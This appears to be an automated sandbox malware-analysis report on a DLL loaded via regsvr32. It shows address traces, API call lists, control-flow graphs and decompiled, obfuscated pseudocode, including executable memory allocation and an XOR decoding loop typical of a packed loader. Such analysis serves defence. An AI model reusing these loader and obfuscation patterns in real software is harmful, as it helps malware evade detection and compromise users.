                          0x003d390d
                          0x003d3917
                          0x003d391a
                          0x003d3921
                          0x003d3928
                          0x003d392f
                          0x003d3944
                          0x003d394c
                          0x003d395e
                          0x003d394e
                          0x003d394e
                          0x003d3951
                          0x003d3954
                          0x003d395a
                          0x003d395a
                          0x003d3961
                          0x003d3968
                          0x003d398e
                          0x003d3997
                          0x003d39a4
                          0x003d39aa
                          0x003d39ac
                          0x003d39af
                          0x003d39af
                          0x003d39b3
                          0x003d39b6
                          0x003d3a8e
                          0x003d3a93
                          0x003d3a93
                          0x003d3a96
                          0x003d3a99
                          0x00000000
                          0x00000000
                          0x003d3a9f
                          0x003d3aa6
                          0x003d3aa6
                          0x003d3ab7
                          0x003d3acb
                          0x003d3ad6
                          0x003d3adf
                          0x003d3ae4
                          0x003d3ae6
                          0x003d3ae9
                          0x003d3aeb
                          0x003d3b03
                          0x003d3b03
                          0x003d3b05
                          0x003d3b08
                          0x003d3b0e
                          0x003d3b0e
                          0x003d3b15
                          0x003d3b1a
                          0x003d3b1c
                          0x003d3b1f
                          0x003d3b24
                          0x003d3b29
                          0x003d3b2e
                          0x003d3b32
                          0x003d3b35
                          0x003d3b37
                          0x003d3b3b
                          0x003d3b40
                          0x003d3b43
                          0x003d3b47
                          0x003d3b47
                          0x003d3b35
                          0x003d3b4b
                          0x003d3b4e
                          0x003d3b57
                          0x003d3b5c
                          0x003d3b5f
                          0x003d3b6b
                          0x003d3b70
                          0x003d3b78
                          0x003d3b83
                          0x003d3b8c
                          0x003d3b96
                          0x003d3b99
                          0x003d3baf
                          0x003d3b9b
                          0x003d3b9b
                          0x003d3ba0
                          0x003d3ba3
                          0x003d3ba8
                          0x003d3ba8
                          0x003d3ba3
                          0x003d3bb2
                          0x003d3bb5
                          0x003d3bc1
                          0x003d3bce
                          0x003d3bd3
                          0x003d3bd6
                          0x00000000
                          0x00000000
                          0x003d3bd8
                          0x003d3be5
                          0x003d3bec
                          0x003d3bf1
                          0x003d3bf4
                          0x003d3bfc
                          0x003d3bf6
                          0x003d3bf6
                          0x003d3bf8
                          0x003d3bf8
                          0x003d3bff
                          0x003d3c07
                          0x003d3c9d
                          0x003d3ca5
                          0x00000000
                          0x003d3c0d
                          0x003d3c16
                          0x003d3c1b
                          0x003d3c1e
                          0x003d3c26
                          0x003d3c20
                          0x003d3c22
                          0x003d3c22
                          0x003d3c32
                          0x003d3c37
                          0x003d3c3a
                          0x003d3c4b
                          0x003d3c3c
                          0x003d3c3e
                          0x003d3c41
                          0x003d3c41
                          0x003d3c44
                          0x003d3c46
                          0x003d3c46
                          0x003d3c4e
                          0x003d3c52
                          0x003d3c55
                          0x003d3c74
                          0x003d3c79
                          0x003d3c7c
                          0x003d3c8f
                          0x003d3c7e
                          0x003d3c8b
                          0x003d3c8b
                          0x003d3c92
                          0x003d3c95
                          0x00000000
                          0x003d3c97
                          0x003d3c97
                          0x00000000
                          0x003d3c97
                          0x003d3c57
                          0x003d3c57
                          0x003d3c5c
                          0x003d3c61
                          0x003d3c64
                          0x00000000
                          0x00000000
                          0x003d3c6a
                          0x00000000
                          0x003d3c6a
                          0x003d3c55
                          0x003d3bb7
                          0x003d3bb7
                          0x003d3bb7
                          0x00000000
                          0x003d3bb7
                          0x003d3bb5
                          0x003d3b61
                          0x003d3b61
                          0x003d3b4e
                          0x00000000
                          0x003d3b08
                          0x003d39bc
                          0x003d39c8
                          0x003d39cd
                          0x003d39d0
                          0x003d39fb
                          0x003d39d2
                          0x003d39de
                          0x003d39f5
                          0x003d39f7
                          0x003d39f7
                          0x003d39fe
                          0x003d3a00
                          0x003d3a7e
                          0x003d3a86
                          0x00000000
                          0x003d3a02
                          0x003d3a02
                          0x003d3a0b
                          0x003d3a10
                          0x003d3a13
                          0x003d3a30
                          0x003d3a15
                          0x003d3a1d
                          0x003d3a22
                          0x003d3a2a
                          0x003d3a2c
                          0x003d3a2c
                          0x003d3a33
                          0x003d3a35
                          0x00000000
                          0x00000000
                          0x003d3a3f
                          0x003d3a41
                          0x003d3a46
                          0x003d3a48
                          0x003d3a4a
                          0x00000000
                          0x00000000
                          0x00000000
                          0x003d3a4a
                          0x003d3a4c
                          0x003d3a52
                          0x003d3a54
                          0x003d3a5b
                          0x003d3a5b
                          0x003d3a5b
                          0x003d3a66
                          0x003d3a6b
                          0x003d3a6e
                          0x003d3a78
                          0x003d3a78
                          0x003d3a7a
                          0x003d3a7c
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x003d3a7c
                          0x003d396a
                          0x003d3973
                          0x003d397b
                          0x003d3984
                          0x003d3cac
                          0x003d3caf
                          0x00000000
                          0x00000000
                          0x003d3cb1
                          0x003d3cb4
                          0x00000000
                          0x003d3cb4
                          0x003d397d
                          0x003d397d
                          0x003d3caa
                          0x003d3caa
                          0x00000000
                          0x003d3caa

                          APIs
                          • GetModuleHandleA.KERNEL32 ref: 003D382B
                            • Part of subcall function 003D40F8: HeapAlloc.KERNEL32 ref: 003D4177
                          • HeapAlloc.KERNEL32 ref: 003D38D5
                            • Part of subcall function 003D908C: SetLastError.KERNEL32 ref: 003D90C8
                          • HeapAlloc.KERNEL32 ref: 003D39A4
                          • RegOpenKeyW.ADVAPI32 ref: 003D39F5
                          • RegEnumKeyW.ADVAPI32 ref: 003D3A2A
                          • RegCloseKey.KERNELBASE ref: 003D3A78
                          • HeapFree.KERNEL32 ref: 003D3A86
                          Memory Dump Source
                          • Source File: 00000003.00000002.389034131.00000000003D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_3d0000_regsvr32.jbxd
                          Similarity
                          • API ID: Heap$Alloc$CloseEnumErrorFreeHandleLastModuleOpen
                          • String ID:
                          • API String ID: 2248784776-0
                          • Opcode ID: 03b9e08f7f171e55b68982e9ab9dcd45ced2ce91f8a972c249c0af0ddad459e0
                          • Instruction ID: 242b0d9700c2d14db3c44b4990ee8d33efd0ecaa39e491d71879eb5b566c9484
                          • Opcode Fuzzy Hash: 03b9e08f7f171e55b68982e9ab9dcd45ced2ce91f8a972c249c0af0ddad459e0
                          • Instruction Fuzzy Hash: F0C1C027310B8196DA22EBA2F4847AA6325F788788F554413DE8E4B715DF78DE99C302
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 496 3da0ac-3da0e9 call 3d908c 499 3da0eb-3da113 CreateFileW 496->499 500 3da115 496->500 501 3da117-3da11b 499->501 500->501 502 3da1f7-3da208 call 3d908c 501->502 503 3da121-3da132 call 3d908c 501->503 508 3da20a-3da20e 502->508 509 3da210 502->509 510 3da13e-3da157 call 3d908c 503->510 511 3da134-3da139 503->511 512 3da215-3da234 508->512 509->512 516 3da159-3da1a9 NtQueryDirectoryFile 510->516 517 3da1ab 510->517 511->510 518 3da1b0-3da1b2 516->518 517->518 519 3da1dc-3da1ed call 3d908c 518->519 520 3da1b4-3da1bc 518->520 521 3da1c0 519->521 526 3da1ef-3da1f5 519->526 520->521 523 3da1c2-3da1d3 call 3d908c 521->523 523->512 528 3da1d5-3da1da 523->528 526->523 528->512
                          APIs
                            • Part of subcall function 003D908C: SetLastError.KERNEL32 ref: 003D90C8
                          • CreateFileW.KERNELBASE ref: 003DA10E
                          • NtQueryDirectoryFile.NTDLL ref: 003DA1A5
                          Memory Dump Source
                          • Source File: 00000003.00000002.389034131.00000000003D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_3d0000_regsvr32.jbxd
                          Similarity
                          • API ID: File$CreateDirectoryErrorLastQuery
                          • String ID:
                          • API String ID: 2967190759-0
                          • Opcode ID: f814dd8b6d3da2fcbfd4e7d7d81ec7b5df8dd2866cc2a168341a68cf2791420f
                          • Instruction ID: 03aaf2d3ddc3632deba399408ed78d704802fd1bdf07d9c3b4005cc8fa7e7904
                          • Opcode Fuzzy Hash: f814dd8b6d3da2fcbfd4e7d7d81ec7b5df8dd2866cc2a168341a68cf2791420f
                          • Instruction Fuzzy Hash: B6419C73304B8086EB52AB52F58036A66A0F7CC790F184627EE9D47B89DF38D959C711
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 60%
                          			E00007FF87FF88C076D50(intOrPtr __ecx, void* __rax, void* __rcx, signed int* __rdx, long long __rsi, void* __r8) {
                          				void* __rbx;
                          				void* __r13;
                          				signed int _t112;
                          				signed int _t117;
                          				signed int _t153;
                          				signed int _t161;
                          				signed int _t169;
                          				signed int _t176;
                          				signed int _t183;
                          				long long _t184;
                          				void* _t186;
                          				void* _t190;
                          				void* _t194;
                          				void* _t196;
                          				void* _t197;
                          				void* _t201;
                          				signed int* _t202;
                          				void* _t203;
                          				void* _t206;
                          				long _t208;
                          				void* _t211;
                          
                          				_t199 = __r8;
                          				_t186 = __rcx;
                          				 *((long long*)(_t196 + 0x10)) = __rdx;
                          				 *((intOrPtr*)(_t196 + 8)) = __ecx;
                          				_push(_t184);
                          				_push(_t194);
                          				_push(_t190);
                          				_push(_t206);
                          				_t197 = _t196 - 0x90;
                          				_t176 =  *(_t197 + 0x130);
                          				r11d = r9d;
                          				r10d = __rax - 0x16de;
                          				 *((intOrPtr*)(_t197 + 0xe8)) = __rcx + 0x114f;
                          				r13d = __rax - 0x37e1;
                          				 *(_t197 + 0x130) = r10d;
                          				r15d = _t190 - 0x23f6;
                          				 *(_t197 + 0x80) = _t194 + 0x17b;
                          				r8d = _t211 + 0x3a59;
                          				r12d = __rcx - 0x165d;
                          				 *(_t197 + 0x100) = r12d;
                          				r9d = __rcx - 0x1351;
                          				if ( *(_t197 + 0x100) + 0xffffec15 - r8d >= 0) goto 0x8c076e2c;
                          				_t183 = __rdx[0x34];
                          				r8d = 0x3000;
                          				_t21 = _t186 + 0x40; // 0x40
                          				r9d = _t21;
                          				_t153 =  *((intOrPtr*)(_t183 + 0x50)) + 0x00000fff & 0xfffff000;
                          				__rdx[0x64] = _t153;
                          				VirtualAlloc(_t211, _t208); // executed
                          				__rdx[0x30] = _t183;
                          				goto 0x8c07710b;
                          				r10d =  *__rdx;
                          				r8d = __rdx[0x50];
                          				r10d = r10d | _t153;
                          				r8d = r8d + __rdx[0x6c];
                          				r8d = r8d ^ 0x00002598;
                          				r10d = r10d +  *__rdx;
                          				 *(_t197 + 0x50) = __rdx[0x36] + __rdx[0x40] ^ 0x00003a59;
                          				 *((long long*)(_t197 + 0xe0)) = __rsi;
                          				r11d = r9d;
                          				r11d = r11d - __rdx[0x18];
                          				r11d = r11d + 0x38e9;
                          				r9d = r15d;
                          				 *(_t197 + 0x48) = __rdx[0x66] * r9d & r9d;
                          				r9d = r9d & _t176;
                          				 *(_t197 + 0x40) = r8d;
                          				 *(_t197 + 0x38) = r10d;
                          				r8d =  *(_t197 + 0xf0) + 0x00000d93 | __rdx[0x12];
                          				 *(_t197 + 0x30) = r11d;
                          				 *(_t197 + 0x28) = (__rdx[0x88] & r10d) - 0x38e9;
                          				 *(_t197 + 0x20) = __rdx[0x70] ^ _t153;
                          				_t112 = E00007FF87FF88C072A70(_t184, __rcx, __rdx, __r8, _t203);
                          				r9d = _t211 - 0x3666;
                          				r9d = r9d ^ 0x000037e1;
                          				r10d = __rdx[0x54];
                          				r10d = r10d + 0x343a;
                          				r11d = __rdx[0x48];
                          				r11d = r11d ^ 0x00001f2c;
                          				 *(_t197 + 0xf0) = _t112;
                          				r13d = r13d - r12d;
                          				r8d = _t194 - 0x37e1;
                          				 *(_t197 + 0x48) = __rdx[0x68] & __rdx[0x50] & 0x0000228c;
                          				 *(_t197 + 0x40) = __rdx;
                          				 *(_t197 + 0x38) = r10d;
                          				 *(_t197 + 0x30) = r11d;
                          				 *(_t197 + 0x28) = (__rdx[0x62] | __rdx[0x8a]) ^ _t176;
                          				 *(_t197 + 0x20) =  *__rdx ^ r13d ^ 0x00002598;
                          				r12d = E00007FF87FF88C0898F0(r13d, _t183, __rdx, _t199, _t201, _t206);
                          				r15d = __rdx[0x32];
                          				_t117 = __rdx[0x62];
                          				r15d = r15d ^ __rdx[0x48];
                          				r13d = __rdx[0x6c];
                          				_t169 = __rdx[0x4c];
                          				_t202 =  *((intOrPtr*)(_t197 + 0xd8));
                          				r14d = __rdx[0x54];
                          				r14d = r14d | _t117;
                          				r8d =  *_t202;
                          				r8d = r8d + _t202[0x38];
                          				r11d = _t202[0x1e];
                          				r10d = _t202[0x8a];
                          				_t161 =  *(_t197 + 0xf0);
                          				r10d = r10d - 0x3666;
                          				r8d = r8d | _t161;
                          				r13d = r13d | 0x000027b2;
                          				r13d = r13d - _t202[0x24];
                          				_t189 =  *((intOrPtr*)(_t197 + 0xd8));
                          				r11d = r11d |  *(_t197 + 0x80);
                          				r11d = r11d +  *((intOrPtr*)(_t197 + 0xe8));
                          				 *(_t197 + 0x78) = r15d;
                          				 *(_t197 + 0x70) = r14d;
                          				 *(_t197 + 0x68) = _t186 + __rdx & _t202[0x16];
                          				 *((intOrPtr*)(_t197 + 0x60)) = _t202[0x44] + 0x38e9 + r13d;
                          				 *(_t197 + 0xf0) = _t117 ^  *(_t197 + 0x80);
                          				 *(_t197 + 0xd0) = ( *(_t197 + 0xd0) - _t161 + 0xea2) * _t169;
                          				r9d =  *(_t197 + 0x110);
                          				r12d =  *(_t197 + 0x100);
                          				r9d = r9d + 0xffffe749;
                          				r9d = r9d ^ _t169;
                          				r12d = r12d | 0x000038e9;
                          				r9d = r9d |  *( *((intOrPtr*)(_t197 + 0xd8)) + 0x100);
                          				 *(_t197 + 0x58) =  *(_t197 + 0xd0);
                          				 *(_t197 + 0x50) =  *(_t197 + 0x130) + _t202[0x72] ^ 0x0000343a;
                          				 *(_t197 + 0x48) = r11d;
                          				 *(_t197 + 0x40) = r10d;
                          				r10d =  *(_t197 + 0xf0);
                          				 *(_t197 + 0x38) = r10d;
                          				 *(_t197 + 0x30) = r13d;
                          				 *(_t197 + 0x28) = r8d;
                          				 *(_t197 + 0x20) = _t202[0x74] ^  *(_t197 + 0x130);
                          				E00007FF87FF88C08A750(_t183, _t186,  *((intOrPtr*)(_t197 + 0xd8)), _t189, _t202);
                          				return  *((intOrPtr*)(_t197 + 0xe8)) + 0xffffeba5;
                          			}
























                          0x7ff88c076d50
                          0x7ff88c076d50
                          0x7ff88c076d50
                          0x7ff88c076d55
                          0x7ff88c076d59
                          0x7ff88c076d5a
                          0x7ff88c076d5b
                          0x7ff88c076d5e
                          0x7ff88c076d64
                          0x7ff88c076d78
                          0x7ff88c076d89
                          0x7ff88c076d93
                          0x7ff88c076d9a
                          0x7ff88c076da1
                          0x7ff88c076da8
                          0x7ff88c076dbb
                          0x7ff88c076dc2
                          0x7ff88c076dc9
                          0x7ff88c076dd0
                          0x7ff88c076dd7
                          0x7ff88c076ddf
                          0x7ff88c076de9
                          0x7ff88c076deb
                          0x7ff88c076df4
                          0x7ff88c076dfd
                          0x7ff88c076dfd
                          0x7ff88c076e07
                          0x7ff88c076e0d
                          0x7ff88c076e14
                          0x7ff88c076e1a
                          0x7ff88c076e27
                          0x7ff88c076e43
                          0x7ff88c076e4c
                          0x7ff88c076e53
                          0x7ff88c076e56
                          0x7ff88c076e64
                          0x7ff88c076e6b
                          0x7ff88c076e77
                          0x7ff88c076e7b
                          0x7ff88c076e98
                          0x7ff88c076e9b
                          0x7ff88c076ea9
                          0x7ff88c076eb3
                          0x7ff88c076eb6
                          0x7ff88c076eba
                          0x7ff88c076ebd
                          0x7ff88c076ec5
                          0x7ff88c076eca
                          0x7ff88c076ecd
                          0x7ff88c076ed2
                          0x7ff88c076ed6
                          0x7ff88c076eda
                          0x7ff88c076ee6
                          0x7ff88c076ef4
                          0x7ff88c076efb
                          0x7ff88c076f07
                          0x7ff88c076f0e
                          0x7ff88c076f1f
                          0x7ff88c076f33
                          0x7ff88c076f3a
                          0x7ff88c076f5c
                          0x7ff88c076f63
                          0x7ff88c076f6a
                          0x7ff88c076f6f
                          0x7ff88c076f74
                          0x7ff88c076f79
                          0x7ff88c076f7d
                          0x7ff88c076f8d
                          0x7ff88c076f97
                          0x7ff88c076f9e
                          0x7ff88c076fa5
                          0x7ff88c076fa8
                          0x7ff88c076faf
                          0x7ff88c076fb9
                          0x7ff88c076fc1
                          0x7ff88c076fc4
                          0x7ff88c076fcb
                          0x7ff88c076fce
                          0x7ff88c076fdc
                          0x7ff88c076fe6
                          0x7ff88c076ff0
                          0x7ff88c076ff7
                          0x7ff88c077005
                          0x7ff88c07700f
                          0x7ff88c077016
                          0x7ff88c07701f
                          0x7ff88c07702d
                          0x7ff88c077035
                          0x7ff88c077044
                          0x7ff88c077049
                          0x7ff88c07704e
                          0x7ff88c077052
                          0x7ff88c077059
                          0x7ff88c07706e
                          0x7ff88c07708b
                          0x7ff88c077096
                          0x7ff88c07709e
                          0x7ff88c0770a5
                          0x7ff88c0770a8
                          0x7ff88c0770af
                          0x7ff88c0770bd
                          0x7ff88c0770c1
                          0x7ff88c0770c5
                          0x7ff88c0770ca
                          0x7ff88c0770cf
                          0x7ff88c0770d7
                          0x7ff88c0770dc
                          0x7ff88c0770e1
                          0x7ff88c0770eb
                          0x7ff88c0770f2
                          0x7ff88c07711d

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.389521559.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000003.00000002.389503061.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389771313.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389956635.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389983202.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390104358.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390153087.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff88c070000_regsvr32.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 701046bcfc664d896e7e8cbef1e18b682c6a552b8b4cc95593f1301737a4187d
                          • Instruction ID: 07da8353950446368a8f1827b676250d952d3cd75b32a9e2919a2c6c256911b1
                          • Opcode Fuzzy Hash: 701046bcfc664d896e7e8cbef1e18b682c6a552b8b4cc95593f1301737a4187d
                          • Instruction Fuzzy Hash: 07914BB36186D08BD326CF19E448B9EBBA4F788788F514129DF8957B58C739EA51CF00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 7ff88c07b3a0-7ff88c07b3a6 1 7ff88c07b3a8-7ff88c07b3ab 0->1 2 7ff88c07b3e1-7ff88c07b538 0->2 4 7ff88c07b3ad-7ff88c07b3b0 1->4 5 7ff88c07b3d5-7ff88c07b414 call 7ff88c07b89c 1->5 6 7ff88c07b53e-7ff88c07b559 call 7ff88c07b72c 2->6 7 7ff88c07b53a-7ff88c07b53c 2->7 9 7ff88c07b3c8 __scrt_dllmain_crt_thread_attach 4->9 10 7ff88c07b3b2-7ff88c07b3b5 4->10 23 7ff88c07b41d-7ff88c07b432 call 7ff88c07b72c 5->23 24 7ff88c07b416-7ff88c07b418 5->24 21 7ff88c07b55b-7ff88c07b560 call 7ff88c07bc0c 6->21 22 7ff88c07b565-7ff88c07b58c call 7ff88c07b858 call 7ff88c07b888 call 7ff88c07ba50 call 7ff88c07ba74 6->22 12 7ff88c07b58e-7ff88c07b59d 7->12 11 7ff88c07b3cd-7ff88c07b3d4 9->11 15 7ff88c07b3b7-7ff88c07b3c0 10->15 16 7ff88c07b3c1-7ff88c07b3c6 call 7ff88c07b7dc 10->16 16->11 21->22 22->12 32 7ff88c07b43e-7ff88c07b44f call 7ff88c07b79c 23->32 33 7ff88c07b434-7ff88c07b439 call 7ff88c07bc0c 23->33 27 7ff88c07b505-7ff88c07b51a 24->27 40 7ff88c07b4b8-7ff88c07b4c2 call 7ff88c07ba50 32->40 41 7ff88c07b451-7ff88c07b48d call 7ff88c07bd54 call 7ff88c07baf0 call 7ff88c07bbb4 call 7ff88c07baf0 call 7ff88c07bbe0 call 7ff88c07d0c8 32->41 33->32 40->24 49 7ff88c07b4c8-7ff88c07b4d4 call 7ff88c07bbfc 40->49 41->40 68 7ff88c07b48f-7ff88c07b496 __scrt_dllmain_after_initialize_c 41->68 55 7ff88c07b4fa-7ff88c07b500 49->55 56 7ff88c07b4d6-7ff88c07b4e0 call 7ff88c07b9b4 49->56 55->27 56->55 62 7ff88c07b4e2-7ff88c07b4f5 call 7ff88c07bdec 56->62 62->55 68->40 69 7ff88c07b498-7ff88c07b4b5 call 7ff88c07d050 68->69 69->40
                          C-Code - Quality: 100%
                          			E00007FF87FF88C07B3A0(void* __edx) {
                          				void* _t5;
                          
                          				_t5 = __edx;
                          				if (_t5 == 0) goto 0x8c07b3e1;
                          				if (_t5 == 0) goto 0x8c07b3d5;
                          				if (_t5 == 0) goto 0x8c07b3c8;
                          				if (__edx == 1) goto 0x8c07b3c1;
                          				return 1;
                          			}




                          0x7ff88c07b3a4
                          0x7ff88c07b3a6
                          0x7ff88c07b3ab
                          0x7ff88c07b3b0
                          0x7ff88c07b3b5
                          0x7ff88c07b3c0

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.389521559.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000003.00000002.389503061.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389771313.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389956635.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389983202.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390104358.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390153087.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff88c070000_regsvr32.jbxd
                          Similarity
                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_is_nonwritable_in_current_image__scrt_release_startup_lock
                          • String ID:
                          • API String ID: 3885183344-0
                          • Opcode ID: 4b4e070a4b30cda99fb3dc24f2d45a93fe48c4a995dadef060bf1a20821bd7b8
                          • Instruction ID: ebc0c4238855db4a30a4edf9e908227cd1dfd213298ef84b59b9eeeaa348b8e1
                          • Opcode Fuzzy Hash: 4b4e070a4b30cda99fb3dc24f2d45a93fe48c4a995dadef060bf1a20821bd7b8
                          • Instruction Fuzzy Hash: FA51AD20E0C64385FE68AB65E8422B926A0BF777C0F445035E94D876DFCF2EE995CB10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 40%
                          			E00007FF87FF88C072380(signed int __rax, long long __rbx, void* __rcx, void* __rdx, signed int* __r8, void* __r9, long long __r12) {
                          				void* __rsi;
                          				signed int _t119;
                          				signed int _t160;
                          				void* _t163;
                          				signed int _t172;
                          				signed long long _t180;
                          				signed long long _t200;
                          				signed long long _t201;
                          				void* _t202;
                          				void* _t204;
                          				long long _t206;
                          				void* _t208;
                          				void* _t209;
                          				void* _t219;
                          				void* _t223;
                          				void* _t225;
                          				void* _t227;
                          
                          				_t172 = __rax;
                          				goto 0x8c091440;
                          				asm("int3");
                          				asm("int3");
                          				asm("int3");
                          				asm("int3");
                          				asm("int3");
                          				asm("int3");
                          				_t219 = _t208;
                          				 *((long long*)(_t219 + 0x18)) = __rbx;
                          				 *((long long*)(_t219 + 0x20)) = _t206;
                          				_push(_t204);
                          				_t209 = _t208 - 0x60;
                          				r13d = __r9 + 0x6ab;
                          				 *(_t209 + 0xb8) =  *((intOrPtr*)(_t209 + 0xc8)) + 0x152;
                          				 *((intOrPtr*)(_t209 + 0x98)) =  *(_t209 + 0xb8) + 0xfffffc37;
                          				r14d = __rcx + 0x37e1;
                          				r15d = __rdx + 0x1249;
                          				r14d =  <  ? __r9 - 0x2103 : r14d;
                          				if (r15d - _t206 + 0x3a59 > 0) goto 0x8c072709;
                          				 *((long long*)(_t219 + 8)) = __r12;
                          				_t163 = r14d - _t227 + 0x108;
                          				if (_t163 > 0) goto 0x8c0725c8;
                          				 *((long long*)(_t219 - 0x60)) = 0x2032;
                          				r12d = 0x3189;
                          				 *(_t209 + 0x20) = 0x3595;
                          				r8d = r12d;
                          				r9d = 0x1f2c;
                          				E00007FF87FF88C079AC0(__r8, __rcx, __r8, _t206, _t227); // executed
                          				r11d = _t202 + 0x19d;
                          				 *(_t209 + 0x50) = __r8;
                          				r10d = _t225 - 0x1033;
                          				__r8[0x22] = _t172;
                          				 *(_t209 + 0x48) = _t223 - 0x3b8;
                          				_t160 = __rcx - 0x114f;
                          				 *(_t209 + 0x40) = r10d;
                          				r8d = __rcx - 0x2ad;
                          				 *(_t209 + 0x38) = r11d;
                          				r9d = _t225 - 0x16de;
                          				 *(_t209 + 0x30) = _t206 + 0x36e7;
                          				 *((intOrPtr*)(_t209 + 0x28)) = __rdx + 0xfffffa9a;
                          				 *(_t209 + 0x20) = _t160;
                          				E00007FF87FF88C08F160(_t172, __r8, __r8, _t225, _t223, _t202);
                          				r8d = 0;
                          				if (_t163 == 0) goto 0x8c072589;
                          				r9d = r8d;
                          				asm("o16 nop [eax+eax]");
                          				_t200 = __r8[0x90];
                          				 *(__r9 + __r8[0x22]) =  *(_t200 + __r8[2]) & 0x000000ff ^  *(__r8[0x14] + __r9);
                          				__r8[0x90] = ( *((intOrPtr*)(__r8[0x10] + 0x130)) - 0x23f6) % __r8[0xe];
                          				__r8[0x7c] = __r8[0x7c] + 0x1f2c;
                          				if (__r8[0x78] != __r8[0xc]) goto 0x8c072568;
                          				__r8[0x32] = __r8[0x32] + 0xffffdfce;
                          				r8d = r8d + 1;
                          				_t180 = r8d;
                          				if (_t180 - _t200 < 0) goto 0x8c0724f0;
                          				__r8[0x66] = __r8[0x66] | 0x0a01b449;
                          				_t119 = __r8[0x4c] ^ 0x0000127e;
                          				if (_t119 - r12d >= 0) goto 0x8c0725b8;
                          				r12d = r12d - _t119;
                          				__r8[0x66] = __r8[0x66] + _t180 * 0x44f9;
                          				__r8[0x56] = __r8[0x14];
                          				goto 0x8c072701;
                          				if (r14d - _t204 + 0x329d + r14d >= 0) goto 0x8c072624;
                          				_t201 = _t200 | __r8[0x2a];
                          				if (__r8[0x2e] - _t201 > 0) goto 0x8c072624;
                          				if ( *((intOrPtr*)( *__r8 + 0x1d0)) + 0x8acf - _t201 <= 0) goto 0x8c072610;
                          				__r8[0x32] = __r8[0x32] - ( *__r8 - 0x00001f2c ^ 0x00002032);
                          				if (__r8[0x7e] - (_t160 | r13d) < 0) goto 0x8c0726ed;
                          				r10d = _t160;
                          				r11d = __r8[0x78];
                          				r15d = r15d - (__r8[6] ^ r15d);
                          				r11d = r11d - __r8[0x74];
                          				r11d = r11d + __r8[0x24];
                          				r14d = r14d *  *__r8;
                          				r15d = r15d + 0xea7;
                          				r10d = r10d - __r8[0x12];
                          				r15d = r15d ^ 0x00002598;
                          				r8d = __r8[4];
                          				r9d = _t160;
                          				r8d = r8d &  *(_t209 + 0xb8);
                          				r12d = 0x3189;
                          				 *(_t209 + 0x58) = __r8[0x54] & 0x0000228c;
                          				r9d = r9d | r12d;
                          				 *(_t209 + 0x50) = _t160 & 0x00003666;
                          				 *(_t209 + 0x48) = r11d;
                          				 *(_t209 + 0x40) = __r8;
                          				 *(_t209 + 0x38) = r10d;
                          				 *(_t209 + 0x30) = r15d;
                          				 *((intOrPtr*)(_t209 + 0x28)) = _t223 - 0x343a;
                          				 *(_t209 + 0x20) = r14d;
                          				E00007FF87FF88C072060(__r8, _t160 | r13d, _t201, _t204, _t206, __r8[0x32] - ( *__r8 - 0x00001f2c ^ 0x00002032));
                          				__r8[0x62] = __r8[0x62] - __r8[0x4c] + _t160;
                          				return  *((intOrPtr*)(_t209 + 0xc0)) + 0xffffee61;
                          			}




















                          0x7ff88c072380
                          0x7ff88c072385
                          0x7ff88c07238a
                          0x7ff88c07238b
                          0x7ff88c07238c
                          0x7ff88c07238d
                          0x7ff88c07238e
                          0x7ff88c07238f
                          0x7ff88c072390
                          0x7ff88c072393
                          0x7ff88c072397
                          0x7ff88c07239b
                          0x7ff88c0723a3
                          0x7ff88c0723bc
                          0x7ff88c0723d4
                          0x7ff88c0723e1
                          0x7ff88c0723eb
                          0x7ff88c0723f2
                          0x7ff88c072402
                          0x7ff88c07240f
                          0x7ff88c07241c
                          0x7ff88c072420
                          0x7ff88c072423
                          0x7ff88c07242e
                          0x7ff88c072436
                          0x7ff88c07243c
                          0x7ff88c072441
                          0x7ff88c072444
                          0x7ff88c072452
                          0x7ff88c07245e
                          0x7ff88c072465
                          0x7ff88c07246a
                          0x7ff88c072471
                          0x7ff88c07248b
                          0x7ff88c07248f
                          0x7ff88c072495
                          0x7ff88c07249a
                          0x7ff88c0724a1
                          0x7ff88c0724a6
                          0x7ff88c0724ad
                          0x7ff88c0724b8
                          0x7ff88c0724c3
                          0x7ff88c0724c7
